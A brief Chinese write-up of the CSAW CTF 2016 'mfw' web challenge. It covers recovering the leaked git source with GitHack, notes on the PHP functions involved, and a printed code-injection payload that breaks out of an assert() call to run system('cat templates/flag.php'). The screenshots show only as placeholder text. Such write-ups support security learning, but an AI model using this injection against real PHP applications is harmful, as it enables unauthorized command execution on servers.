攻防世界Web-mfw

时间:2019-05-14 20:02:00   收藏:0   阅读:908

题目来源csaw-ctf-2016-quals

技术分享图片

技术分享图片

使用GitHack

技术分享图片

技术分享图片

技术分享图片

技术分享图片

assert() 检查一个断言是否为 FALSE

strpos() 函数查找字符串在另一字符串中第一次出现的位置。

file_exists() 函数检查文件或目录是否存在。

playload:

?/page=

about.php‘, ‘123‘) === false and system(‘cat templates/flag.php‘) and strpos(‘templates/flag

查看网页源代码

技术分享图片

知识:git漏洞、代码审计

原文:https://www.cnblogs.com/JKding233/p/10864033.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!